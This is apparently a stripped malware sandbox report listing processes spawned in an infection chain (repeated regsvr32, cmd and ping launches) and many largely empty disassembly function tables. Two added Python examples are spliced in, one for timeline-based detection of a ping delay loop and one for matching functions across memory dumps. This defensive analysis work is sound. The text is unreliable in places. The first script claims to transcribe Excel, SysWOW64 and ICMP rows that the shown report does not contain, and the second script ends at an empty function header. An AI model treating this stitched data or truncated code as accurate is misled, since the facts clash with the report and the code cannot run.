Imagebase: | 0x7ff61de10000 |
File size: | 625664 bytes |
MD5 hash: | EA777DEEA782E8B4D7C7C33BBF8A4496 |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Reputation: | high |
General |
---|
Start time: | 15:22:19 |
Start date: | 09/06/2021 |
Path: | C:\Windows\System32\PING.EXE |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff612a90000 |
File size: | 21504 bytes |
MD5 hash: | 6A7389ECE70FB97BFE9A570DB4ACCC3B |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Reputation: | moderate |
General |
---|
Start time: | 15:22:28 |
Start date: | 09/06/2021 |
Path: | C:\Windows\System32\regsvr32.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff62a730000 |
File size: | 24064 bytes |
MD5 hash: | D78B75FC68247E8A63ACBA846182740E |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Reputation: | high |
General |
---|
Start time: | 15:22:34 |
Start date: | 09/06/2021 |
Path: | C:\Windows\System32\cmd.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff7180e0000 |
File size: | 273920 bytes |
MD5 hash: | 4E2ACF4F8A396486AB4268C94A6A245F |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Reputation: | high |
General |
---|
Start time: | 15:22:34 |
Start date: | 09/06/2021 |
Path: | C:\Windows\System32\conhost.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff61de10000 |
File size: | 625664 bytes |
MD5 hash: | EA777DEEA782E8B4D7C7C33BBF8A4496 |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
General |
---|
Start time: | 15:22:35 |
Start date: | 09/06/2021 |
Path: | C:\Windows\System32\PING.EXE |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff612a90000 |
File size: | 21504 bytes |
MD5 hash: | 6A7389ECE70FB97BFE9A570DB4ACCC3B |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
General |
---|
Start time: | 15:22:43 |
Start date: | 09/06/2021 |
Path: | C:\Windows\System32\regsvr32.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff62a730000 |
File size: | 24064 bytes |
MD5 hash: | D78B75FC68247E8A63ACBA846182740E |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
General |
---|
Start time: | 15:22:44 |
Start date: | 09/06/2021 |
Path: | C:\Windows\System32\regsvr32.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff62a730000 |
File size: | 24064 bytes |
MD5 hash: | D78B75FC68247E8A63ACBA846182740E |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
General |
---|
Start time: | 15:22:51 |
Start date: | 09/06/2021 |
Path: | C:\Windows\System32\regsvr32.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff62a730000 |
File size: | 24064 bytes |
MD5 hash: | D78B75FC68247E8A63ACBA846182740E |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
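The process list above carries no parent PIDs and the Commandline cells are empty, so the chain has to be read from start times: Excel, a 32-bit regsvr32, a 64-bit regsvr32, then three rounds of cmd.exe / conhost.exe / PING.EXE each followed by a fresh regsvr32, while the ICMP table shows echo requests to 8.8.7.7 about five seconds apart. The Python below is an added example and not part of the report: the process and ICMP timestamps are transcribed from the General blocks and the ICMP table above; the time windows used as a stand-in for parent/child relationships and the function names are this example's own assumptions.

```python
"""Rebuild a process timeline from a sandbox report's per-process 'General'
blocks and flag the cmd -> ping -> relaunch delay loop in it.
Added example; the data below is transcribed from the report, the windows
used in place of real parent/child links are assumptions of this example.
"""
import ntpath
from collections import Counter
from datetime import datetime, timedelta

# (start time, image path, Wow64 process) transcribed from the General blocks.
PROCESSES = [
    ("15:21:49", r"C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE", True),
    ("15:21:55", r"C:\Windows\SysWOW64\regsvr32.exe", True),
    ("15:21:56", r"C:\Windows\System32\regsvr32.exe", False),
    ("15:22:03", r"C:\Windows\System32\cmd.exe", False),
    ("15:22:04", r"C:\Windows\System32\conhost.exe", False),
    ("15:22:04", r"C:\Windows\System32\PING.EXE", False),
    ("15:22:13", r"C:\Windows\System32\regsvr32.exe", False),
    ("15:22:17", r"C:\Windows\System32\cmd.exe", False),
    ("15:22:18", r"C:\Windows\System32\conhost.exe", False),
    ("15:22:19", r"C:\Windows\System32\PING.EXE", False),
    ("15:22:28", r"C:\Windows\System32\regsvr32.exe", False),
    ("15:22:34", r"C:\Windows\System32\cmd.exe", False),
    ("15:22:34", r"C:\Windows\System32\conhost.exe", False),
    ("15:22:35", r"C:\Windows\System32\PING.EXE", False),
    ("15:22:43", r"C:\Windows\System32\regsvr32.exe", False),
    ("15:22:44", r"C:\Windows\System32\regsvr32.exe", False),
    ("15:22:51", r"C:\Windows\System32\regsvr32.exe", False),
]
# Echo requests to 8.8.7.7, transcribed (whole seconds) from the ICMP table.
ICMP_ECHOES = ["15:22:05", "15:22:10", "15:22:20", "15:22:25", "15:22:36", "15:22:41"]

ZERO = timedelta(0)


def _t(clock):
    """Clock string -> datetime; the date is irrelevant, all rows share one day."""
    return datetime.strptime(clock, "%H:%M:%S")


def timeline():
    """Sorted (start, lower-cased image name, is_wow64) triples."""
    rows = [(_t(t), ntpath.basename(p).lower(), wow) for t, p, wow in PROCESSES]
    return sorted(rows, key=lambda r: r[0])


def starts_of(image):
    return [t for t, img, _ in timeline() if img == image]


def office_followers(window=timedelta(seconds=10)):
    """Images started within `window` after EXCEL.EXE: a timing proxy for
    'Office spawned X' since the report lists no parent PIDs (assumption)."""
    office = starts_of("excel.exe")
    return [img for t, img, _ in timeline()
            if img != "excel.exe" and any(ZERO < t - o <= window for o in office)]


def ping_rounds(window=timedelta(seconds=5)):
    """cmd.exe starts followed by PING.EXE within `window`: one sleep round."""
    pings = starts_of("ping.exe")
    return [c for c in starts_of("cmd.exe") if any(ZERO <= p - c <= window for p in pings)]


def relaunches_after_ping(window=timedelta(seconds=15)):
    """PING.EXE starts followed by a new regsvr32.exe within `window`:
    the stage re-executing itself once the delay has elapsed."""
    regs = starts_of("regsvr32.exe")
    return [p for p in starts_of("ping.exe") if any(ZERO < r - p <= window for r in regs)]


def wow64_hop(window=timedelta(seconds=2)):
    """A 32-bit regsvr32 followed within `window` by a 64-bit one
    (the SysWOW64 -> System32 hand-off visible in the process list)."""
    tl = timeline()
    return any(a[1] == b[1] == "regsvr32.exe" and a[2] and not b[2]
               and ZERO <= b[0] - a[0] <= window
               for a in tl for b in tl)


def echo_intervals():
    """Seconds between consecutive echo requests; a steady cadence is a
    ping-based sleep, not name resolution or connectivity probing."""
    ts = [_t(s) for s in ICMP_ECHOES]
    return [int((b - a).total_seconds()) for a, b in zip(ts, ts[1:])]


def summarize():
    return {
        "processes": len(timeline()),
        "images": dict(Counter(img for _, img, _ in timeline())),
        "office_followers": office_followers(),
        "ping_rounds": len(ping_rounds()),
        "relaunches_after_ping": len(relaunches_after_ping()),
        "wow64_hop": wow64_hop(),
        "echo_intervals_s": echo_intervals(),
    }


if __name__ == "__main__":
    print(summarize())
```

The timing windows are deliberately loose; with real telemetry (Sysmon event 1 or an EDR process tree) the same checks should use ParentProcessId and the command line instead of start-time proximity. What the report does support is the shape: three cmd/ping rounds, each followed by a new regsvr32 within about ten seconds, and echo requests spaced five seconds apart, which is the delay loop a detection for regsvr32 spawning cmd.exe or ping.exe is meant to catch.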
Disassembly |
---|
Code Analysis |
---|
Executed Functions |
---|
Function | Relevance | APIs | Strings | Instructions | Tags | C-Code Quality |
---|---|---|---|---|---|---|
012E02A4 | 14.5 | 1 | 7 | 542 | COMMON, Crypto | 71% |
012D8282 | 10.7 | 1 | 5 | 192 | process, COMMON, Crypto | 42% |
012D4554 | 9.3 | 4 | 1 | 505 | process, COMMON, Crypto | 66% |
012D8D11 | 7.5 | 1 | 3 | 530 | library, COMMON, Crypto | 55% |
012DEFD3 | 5.4 | 1 | 2 | 170 | library, COMMON | 71% |
012D3A22 | 3.6 | 1 | 1 | 63 | synchronization, COMMON | 37% |
012DD1C4 | 1.7 | 1 | - | 153 | COMMON | 60% |
012DC450 | 1.6 | 1 | - | 55 | COMMON | 15% |
012D3998 | 1.5 | 1 | - | 36 | COMMON | 75% |
Non-executed Functions |
---|
Function | Relevance | APIs | Strings | Instructions | Tags | C-Code Quality |
---|---|---|---|---|---|---|
00007FFD696A9D9D | 28.2 | 14 | 2 | 227 | pipe, time, COMMON | - |
00007FFD696A6DAE | 23.0 | 10 | 3 | 252 | file, window, COMMON | - |
00007FFD696B3508 | 5.4 | 1 | 2 | 164 | COMMON | - |
00007FFD696B3714 | 3.6 | 1 | 1 | 101 | COMMON | - |
00007FFD696A1788 | 0.6 | - | - | 650 | COMMON | - |
012DD57B | 0.4 | - | - | 387 | COMMON, Crypto | 51% |
012D9F06 | 0.3 | - | - | 308 | COMMON, Crypto | 74% |
00007FFD696A1284 | 0.3 | - | - | 306 | COMMON | - |
012D3B01 | 0.3 | - | - | 262 | COMMON, Crypto | 95% |
012D5372 | 0.2 | - | - | 194 | COMMON, Crypto | 37% |
012D5EF8 | 0.1 | - | - | 144 | COMMON, Crypto | 100% |
00007FFD696B2254 | 0.1 | - | - | 135 | COMMON | - |
012DC6ED | 0.1 | - | - | 119 | COMMON, Crypto | 100% |
00007FFD696B8940 | 0.0 | - | - | 32 | COMMON | - |
Memory Dump Source |
|
|
Similarity |
|
Uniqueness |
Uniqueness Score: -1.00% |
Function 00007FFD696AA6E2, Relevance: 26.6, APIs: 9, Strings: 6, Instructions: 366memoryfileCOMMON
APIs |
|
Strings |
|
Memory Dump Source |
|
|
Similarity |
|
Uniqueness |
Uniqueness Score: -1.00% |
Function 00007FFD696AC7C3, Relevance: 16.0, APIs: 7, Strings: 2, Instructions: 299pipetimeCOMMON
APIs |
|
Strings |
|
Memory Dump Source |
|
|
Similarity |
|
Uniqueness |
Uniqueness Score: -1.00% |
Function 00007FFD696AE458, Relevance: 16.0, APIs: 2, Strings: 7, Instructions: 233libraryloaderCOMMON
APIs |
|
Strings |
|
Memory Dump Source |
|
|
Similarity |
|
Uniqueness |
Uniqueness Score: -1.00% |
Function 00007FFD696A720B, Relevance: 10.7, APIs: 2, Strings: 4, Instructions: 204COMMON
APIs |
|
Strings |
|
Memory Dump Source |
|
|
Similarity |
|
Uniqueness |
Uniqueness Score: -1.00% |
Function 00007FFD696B8CC8, Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48fileCOMMON
APIs |
|
Strings |
|
Memory Dump Source |
|
|
Similarity |
|
Uniqueness |
Uniqueness Score: -1.00% |
Function 00007FFD696B1B7C, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 24libraryloaderCOMMON
APIs |
|
Strings |
|
Memory Dump Source |
|
|
Similarity |
|
Uniqueness |
Uniqueness Score: -1.00% |
APIs |
|
Memory Dump Source |
|
|
Similarity |
|
Uniqueness |
Uniqueness Score: -1.00% |
APIs |
|
Memory Dump Source |
|
|
Similarity |
|
Uniqueness |
Uniqueness Score: -1.00% |
Function 00007FFD696B7A70, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 100fileCOMMON
APIs |
|
Strings |
|
Memory Dump Source |
|
|
Similarity |
|
Uniqueness |
Uniqueness Score: -1.00% |
Function 00007FFD696ABEDA, Relevance: 6.2, APIs: 4, Instructions: 198filememoryCOMMON
APIs |
|
Memory Dump Source |
|
|
Similarity |
|
Uniqueness |
Uniqueness Score: -1.00% |
APIs |
|
Memory Dump Source |
|
|
Similarity |
|
Uniqueness |
Uniqueness Score: -1.00% |
Function 00007FFD696B1E20, Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 112COMMON
APIs |
|
Strings |
|
Memory Dump Source |
|
|
Similarity |
|
Uniqueness |
Uniqueness Score: -1.00% |
Function 00007FFD696B4D9C, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 70COMMON
APIs |
|
Strings |
|
Memory Dump Source |
|
|
Similarity |
|
Uniqueness |
Uniqueness Score: -1.00% |
Function 00007FFD696B4AD0, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 50COMMON
APIs |
|
Strings |
|
Memory Dump Source |
|
|
Similarity |
|
Uniqueness |
Uniqueness Score: -1.00% |
Function 00007FFD696B4A6C, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 25COMMON
APIs |
|
Strings |
|
Memory Dump Source |
|
|
Similarity |
|
Uniqueness |
Uniqueness Score: -1.00% |
Function 00007FFD696B4A18, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 21COMMON
APIs |
|
Strings |
|
Memory Dump Source |
|
|
Similarity |
|
Uniqueness |
Uniqueness Score: -1.00% |
Function 00007FFD696B4BAC, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 21COMMON
APIs |
|
Strings |
|
Memory Dump Source |
|
|
Similarity |
|
Uniqueness |
Uniqueness Score: -1.00% |
Executed Functions |
---|
Function 005D02A4, Relevance: 14.5, APIs: 1, Strings: 7, Instructions: 542COMMONCrypto
C-Code - Quality: 71% |
|
APIs |
Strings |
Memory Dump Source |
|
|
Similarity |
|
Uniqueness |
Uniqueness Score: -1.00% |
Function 005C8282, Relevance: 10.7, APIs: 1, Strings: 5, Instructions: 192processCOMMONCrypto
C-Code - Quality: 42% |
|
APIs |
|
Strings |
Memory Dump Source |
|
|
Similarity |
|
Uniqueness |
Uniqueness Score: -1.00% |
APIs |
|
Memory Dump Source |
|
|
Similarity |
|
Uniqueness |
Uniqueness Score: -1.00% |
Function 005C5183, Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 125fileCOMMON
C-Code - Quality: 28% |
|
APIs |
Strings |
Memory Dump Source |
|
|
Similarity |
|
Uniqueness |
Uniqueness Score: -1.00% |
APIs |
|
Memory Dump Source |
|
|
Similarity |
|
Uniqueness |
Uniqueness Score: -1.00% |
Function 005CEFD3, Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 170libraryCOMMON
C-Code - Quality: 71% |
|
APIs |
|
Strings |
Memory Dump Source |
|
|
Similarity |
|
Uniqueness |
Uniqueness Score: -1.00% |
APIs |
|
Memory Dump Source |
|
|
Similarity |
|
Uniqueness |
Uniqueness Score: -1.00% |
Function 005C5006, Relevance: 4.6, APIs: 3, Instructions: 102fileCOMMON
C-Code - Quality: 35% |
|
APIs |
Memory Dump Source |
|
|
Similarity |
|
Uniqueness |
Uniqueness Score: -1.00% |
APIs |
|
Memory Dump Source |
|
|
Similarity |
|
Uniqueness |
Uniqueness Score: -1.00% |
Function 005C3A22, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 63synchronizationCOMMON
C-Code - Quality: 37% |
|
APIs |
|
Strings |
|
Memory Dump Source |
|
|
Similarity |
|
Uniqueness |
Uniqueness Score: -1.00% |
APIs |
|
Memory Dump Source |
|
|
Similarity |
|
Uniqueness |
Uniqueness Score: -1.00% |
Function 005CA504, Relevance: 1.7, APIs: 1, Instructions: 236COMMON
C-Code - Quality: 57% |
|
APIs |
|
Memory Dump Source |
|
|
Similarity |
|
Uniqueness |
Uniqueness Score: -1.00% |
C-Code - Quality: 44% |
|
APIs |
|
Memory Dump Source |
|
|
Similarity |
|
Uniqueness |
Uniqueness Score: -1.00% |
Function 005CD1C4, Relevance: 1.7, APIs: 1, Instructions: 153COMMON
C-Code - Quality: 60% |
|
APIs |
|
Memory Dump Source |
|
|
Similarity |
|
Uniqueness |
Uniqueness Score: -1.00% |
Function 005CC450, Relevance: 1.6, APIs: 1, Instructions: 55COMMON
C-Code - Quality: 15% |
|
APIs |
|
Memory Dump Source |
|
|
Similarity |
|
Uniqueness |
Uniqueness Score: -1.00% |
APIs |
|
Memory Dump Source |
|
|
Similarity |
|
Uniqueness |
Uniqueness Score: -1.00% |
APIs |
|
Memory Dump Source |
|
|
Similarity |
|
Uniqueness |
Uniqueness Score: -1.00% |
APIs |
|
Memory Dump Source |
|
|
Similarity |
|
Uniqueness |
Uniqueness Score: -1.00% |
Non-executed Functions |
---|
Function 00007FFD69649D9D, Relevance: 28.2, APIs: 14, Strings: 2, Instructions: 227pipetimeCOMMON
APIs |
|
Strings |
|
Memory Dump Source |
|
|
Similarity |
|
Uniqueness |
Uniqueness Score: -1.00% |
Function 00007FFD69646DAE, Relevance: 23.0, APIs: 10, Strings: 3, Instructions: 252filewindowCOMMON
APIs |
|
Strings |
|
Memory Dump Source |
|
|
Similarity |
|
Uniqueness |
Uniqueness Score: -1.00% |
APIs |
|
Memory Dump Source |
|
|
Similarity |
|
Uniqueness |
Uniqueness Score: -1.00% |
Function 00007FFD69653508, Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 164COMMON
APIs |
|
Strings |
|
Memory Dump Source |
|
|
Similarity |
|
Uniqueness |
Uniqueness Score: -1.00% |
Function 00007FFD6964A6E2, Relevance: 28.4, APIs: 9, Strings: 7, Instructions: 366memoryfileCOMMON
APIs |
|
Strings |
|
Memory Dump Source |
|
|
Similarity |
|
Uniqueness |
Uniqueness Score: -1.00% |
Function 00007FFD6964C7C3, Relevance: 16.0, APIs: 7, Strings: 2, Instructions: 299pipetimeCOMMON
APIs |
|
Strings |
|
Memory Dump Source |
|
|
Similarity |
|
Uniqueness |
Uniqueness Score: -1.00% |
Function 00007FFD6964E458, Relevance: 16.0, APIs: 2, Strings: 7, Instructions: 233libraryloaderCOMMON
APIs |
|
Strings |
|
Memory Dump Source |
|
|
Similarity |
|
Uniqueness |
Uniqueness Score: -1.00% |
Function 00007FFD6964720B, Relevance: 10.7, APIs: 2, Strings: 4, Instructions: 204COMMON
APIs |
|
Strings |
|
Memory Dump Source |
|
|
Similarity |
|
Uniqueness |
Uniqueness Score: -1.00% |
Function 00007FFD69658CC8, Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48fileCOMMON
APIs |
|
Strings |
|
Memory Dump Source |
|
|
Similarity |
|
Uniqueness |
Uniqueness Score: -1.00% |
Function 00007FFD69651B7C, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 24libraryloaderCOMMON
APIs |
|
Strings |
|
Memory Dump Source |
|
|
Similarity |
|
Uniqueness |
Uniqueness Score: -1.00% |
APIs |
|
Memory Dump Source |
|
|
Similarity |
|
Uniqueness |
Uniqueness Score: -1.00% |
APIs |
|
Memory Dump Source |
|
|
Similarity |
|
Uniqueness |
Uniqueness Score: -1.00% |
Function 00007FFD69651E20, Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 112COMMON
APIs |
|
Strings |
|
Memory Dump Source |
|
|
Similarity |
|
Uniqueness |
Uniqueness Score: -1.00% |
Function 00007FFD69657A70, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 100fileCOMMON
APIs |
|
Strings |
|
Memory Dump Source |
|
|
Similarity |
|
Uniqueness |
Uniqueness Score: -1.00% |
Function 00007FFD6964BEDA, Relevance: 6.2, APIs: 4, Instructions: 198filememoryCOMMON
APIs |
|
Memory Dump Source |
|
|
Similarity |
|
Uniqueness |
Uniqueness Score: -1.00% |
APIs |
|
Memory Dump Source |
|
|
Similarity |
|
Uniqueness |
Uniqueness Score: -1.00% |
Function 00007FFD69654D9C, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 70COMMON
APIs |
|
Strings |
|
Memory Dump Source |
|
|
Similarity |
|
Uniqueness |
Uniqueness Score: -1.00% |
Function 00007FFD69654AD0, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 50COMMON
APIs |
|
Strings |
|
Memory Dump Source |
|
|
Similarity |
|
Uniqueness |
Uniqueness Score: -1.00% |
Function 00007FFD69654A6C, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 25COMMON
APIs |
|
Strings |
|
Memory Dump Source |
|
|
Similarity |
|
Uniqueness |
Uniqueness Score: -1.00% |
Function 00007FFD69654A18, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 21COMMON
APIs |
|
Strings |
|
Memory Dump Source |
|
|
Similarity |
|
Uniqueness |
Uniqueness Score: -1.00% |
Function 00007FFD69654BAC, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 21COMMON
APIs |
|
Strings |
|
Memory Dump Source |
|
|
Similarity |
|
Uniqueness |
Uniqueness Score: -1.00% |
Executed Functions |
---|
Function 004602A4, Relevance: 14.5, APIs: 1, Strings: 7, Instructions: 542COMMONCrypto
C-Code - Quality: 71% |
|
APIs |
Strings |
Memory Dump Source |
|
|
Similarity |
|
Uniqueness |
Uniqueness Score: -1.00% |
Function 0045A8E0, Relevance: 12.9, APIs: 3, Strings: 4, Instructions: 609registryCOMMONCrypto
C-Code - Quality: 58% |
|
APIs |
Strings |
Memory Dump Source |
|
|
Similarity |
|
Uniqueness |
Uniqueness Score: -1.00% |
Function 00458282, Relevance: 10.7, APIs: 1, Strings: 5, Instructions: 192processCOMMONCrypto
C-Code - Quality: 42% |
|
APIs |
|
Strings |
Memory Dump Source |
|
|
Similarity |
|
Uniqueness |
Uniqueness Score: -1.00% |
Function 0045EFD3, Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 170libraryCOMMON
C-Code - Quality: 71% |
|
APIs |
|
Strings |
Memory Dump Source |
|
|
Similarity |
|
Uniqueness |
Uniqueness Score: -1.00% |
Function 00453A22, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 63synchronizationCOMMON
C-Code - Quality: 37% |
|
APIs |
|
Strings |
|
Memory Dump Source |
|
|
Similarity |
|
Uniqueness |
Uniqueness Score: -1.00% |
C-Code - Quality: 44% |
|
APIs |
|
Memory Dump Source |
|
|
Similarity |
|
Uniqueness |
Uniqueness Score: -1.00% |
Function 0045D1C4, Relevance: 1.7, APIs: 1, Instructions: 153COMMON
C-Code - Quality: 60% |
|
APIs |
|
Memory Dump Source |
|
|
Similarity |
|
Uniqueness |
Uniqueness Score: -1.00% |
Function 0045C450, Relevance: 1.6, APIs: 1, Instructions: 55COMMON
C-Code - Quality: 15% |
|
APIs |
|
Memory Dump Source |
|
|
Similarity |
|
Uniqueness |
Uniqueness Score: -1.00% |
Non-executed Functions |
---|
Executed Functions |
---|
Function 00A16537, Relevance: 22.1, APIs: 2, Strings: 10, Instructions: 1095networkCOMMONCrypto
C-Code - Quality: 72% |
|
APIs |
Strings |
Memory Dump Source |
|
|
Similarity |
|
Uniqueness |
Uniqueness Score: -1.00% |
Function 00A202A4, Relevance: 16.3, APIs: 2, Strings: 7, Instructions: 543COMMONCrypto
C-Code - Quality: 71% |
|
APIs |
|
Strings |
Memory Dump Source |
|
|
Similarity |
|
Uniqueness |
Uniqueness Score: -1.00% |
Function 00A14554, Relevance: 9.3, APIs: 4, Strings: 1, Instructions: 505processCOMMONCrypto
C-Code - Quality: 66% |
|
APIs |
Strings |
|
Memory Dump Source |
|
|
Similarity |
|
Uniqueness |
Uniqueness Score: -1.00% |
Function 00A1EFD3, Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 170libraryCOMMON
C-Code - Quality: 71% |
|
APIs |
|
Strings |
Memory Dump Source |
|
|
Similarity |
|
Uniqueness |
Uniqueness Score: -1.00% |
Function 00A1CDB9, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 72memoryCOMMON
C-Code - Quality: 51% |
|
APIs |
|
Strings |
Memory Dump Source |
|
|
Similarity |
|
Uniqueness |
Uniqueness Score: -1.00% |
Function 00A13A22, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 63synchronizationCOMMON
C-Code - Quality: 37% |
|
APIs |
|
Strings |
|
Memory Dump Source |
|
|
Similarity |
|
Uniqueness |
Uniqueness Score: -1.00% |
C-Code - Quality: 44% |
|
APIs |
Memory Dump Source |
|
|
Similarity |
|
Uniqueness |
Uniqueness Score: -1.00% |
Function 00A1D1C4, Relevance: 1.7, APIs: 1, Instructions: 153COMMON
C-Code - Quality: 60% |
|
APIs |
|
Memory Dump Source |
|
|
Similarity |
|
Uniqueness |
Uniqueness Score: -1.00% |
Function 00A1C450, Relevance: 1.6, APIs: 1, Instructions: 55COMMON
C-Code - Quality: 15% |
|
APIs |
|
Memory Dump Source |
|
|
Similarity |
|
Uniqueness |
Uniqueness Score: -1.00% |
Non-executed Functions |
---|
Executed Functions |
---|
Function 00FD6537, Relevance: 20.3, APIs: 1, Strings: 10, Instructions: 1095networkCOMMONCrypto
C-Code - Quality: 71% |
|
APIs |
Strings |
Memory Dump Source |
|
|
Similarity |
|
Uniqueness |
Uniqueness Score: -1.00% |
Function 00FE02A4, Relevance: 18.0, APIs: 3, Strings: 7, Instructions: 543COMMONCrypto
C-Code - Quality: 74% |
|
APIs |
|
Strings |
Memory Dump Source |
|
|
Similarity |
|
Uniqueness |
Uniqueness Score: -1.00% |
Function 00FDEFD3, Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 170libraryCOMMON
C-Code - Quality: 71% |
|
APIs |
|
Strings |
Memory Dump Source |
|
|
Similarity |
|
Uniqueness |
Uniqueness Score: -1.00% |
Function 00FDCDB9, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 72memoryCOMMON
C-Code - Quality: 51% |
|
APIs |
|
Strings |
Memory Dump Source |
|
|
Similarity |
|
Uniqueness |
Uniqueness Score: -1.00% |
Function 00FD3A22, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 63synchronizationCOMMON
C-Code - Quality: 37% |
|
APIs |
|
Strings |
|
Memory Dump Source |
|
|
Similarity |
|
Uniqueness |
Uniqueness Score: -1.00% |
C-Code - Quality: 44% |
|
APIs |
Memory Dump Source |
|
|
Similarity |
|
Uniqueness |
Uniqueness Score: -1.00% |
Function 00FDD1C4, Relevance: 1.7, APIs: 1, Instructions: 153COMMON
C-Code - Quality: 60% |
|
APIs |
|
Memory Dump Source |
|
|
Similarity |
|
Uniqueness |
Uniqueness Score: -1.00% |
Function 00FDC450, Relevance: 1.6, APIs: 1, Instructions: 55COMMON
C-Code - Quality: 15% |
|
APIs |
|
Memory Dump Source |
|
|
Similarity |
|
Uniqueness |
Uniqueness Score: -1.00% |
Non-executed Functions |
---|
Executed Functions |
---|
Function 00B76537, Relevance: 20.3, APIs: 1, Strings: 10, Instructions: 1095networkCOMMONCrypto
C-Code - Quality: 71% |
|
APIs |
Strings |
Memory Dump Source |
|
|
Similarity |
|
Uniqueness |
Uniqueness Score: -1.00% |
Function 00B802A4, Relevance: 18.0, APIs: 3, Strings: 7, Instructions: 543COMMONCrypto
C-Code - Quality: 74% |
|
APIs |
|
Strings |
Memory Dump Source |
|
|
Similarity |
|
Uniqueness |
Uniqueness Score: -1.00% |
Function 00B74554, Relevance: 7.5, APIs: 3, Strings: 1, Instructions: 505processCOMMONCrypto
C-Code - Quality: 66% |
|
APIs |
Strings |
|
Memory Dump Source |
|
|
Similarity |
|
Uniqueness |
Uniqueness Score: -1.00% |
Function 00B7EFD3, Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 170libraryCOMMON
C-Code - Quality: 71% |
|
APIs |
|
Strings |
Memory Dump Source |
|
|
Similarity |
|
Uniqueness |
Uniqueness Score: -1.00% |
Function 00B7CDB9, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 72memoryCOMMON
C-Code - Quality: 51% |
|
APIs |
|
Strings |
Memory Dump Source |
|
|
Similarity |
|
Uniqueness |
Uniqueness Score: -1.00% |
Function 00B73A22, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 63synchronizationCOMMON
C-Code - Quality: 37% |
|
APIs |
|
Strings |
|
Memory Dump Source |
|
|
Similarity |
|
Uniqueness |
Uniqueness Score: -1.00% |
C-Code - Quality: 44% |
|
APIs |
Memory Dump Source |
|
|
Similarity |
|
Uniqueness |
Uniqueness Score: -1.00% |
Function 00B7D1C4, Relevance: 1.7, APIs: 1, Instructions: 153COMMON
C-Code - Quality: 60% |
|
APIs |
|
Memory Dump Source |
|
|
Similarity |
|
Uniqueness |
Uniqueness Score: -1.00% |
Function 00B7C450, Relevance: 1.6, APIs: 1, Instructions: 55COMMON
C-Code - Quality: 15% |
|
APIs |
|
Memory Dump Source |
|
|
Similarity |
|
Uniqueness |
Uniqueness Score: -1.00% |
Non-executed Functions |
---|
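The listings above show the same functions several times at different addresses (for example 005D02A4, 004602A4, 00A202A4, 00FE02A4 and 00B802A4, or 00007FFD696A9D9D and 00007FFD69649D9D), because each memory dump carries its own image base. The Python below is an added example for working with such listings; it is not part of the sandbox report or of Joe Sandbox. It parses the function summary lines in the form they survive extraction, splits the run-together tag blob, and clusters functions by the low 16 bits of their address, which survive relocation because Windows maps PE images at 64 KiB-aligned bases. The sample lines are copied from the tables above; the dump labels "dump A" to "dump E" are invented.

```python
"""Match functions across memory dumps of one image (added example, not from the report).
Windows maps PE images at 64 KiB aligned bases, so bits 0-15 of an in-image address survive
relocation and act as a cheap base-independent fingerprint."""
import re
from collections import defaultdict
from dataclasses import dataclass

# A Joe Sandbox function summary line as it survives extraction; APIs/Strings are optional
# and the tag blob is glued onto the instruction count ("Instructions: 542COMMONCrypto").
LINE_RE = re.compile(
    r"Function (?P<addr>[0-9A-Fa-f]+), Relevance: (?P<rel>[\d.]+)"
    r"(?:, APIs: (?P<apis>\d+))?(?:, Strings: (?P<strings>\d+))?"
    r", Instructions: (?P<instr>\d+)(?P<tags>[A-Za-z]*)")
KNOWN_TAGS = ("synchronization", "registry", "network", "process", "library",
              "loader", "memory", "window", "file", "pipe", "time", "COMMON", "Crypto")


def split_tags(blob):
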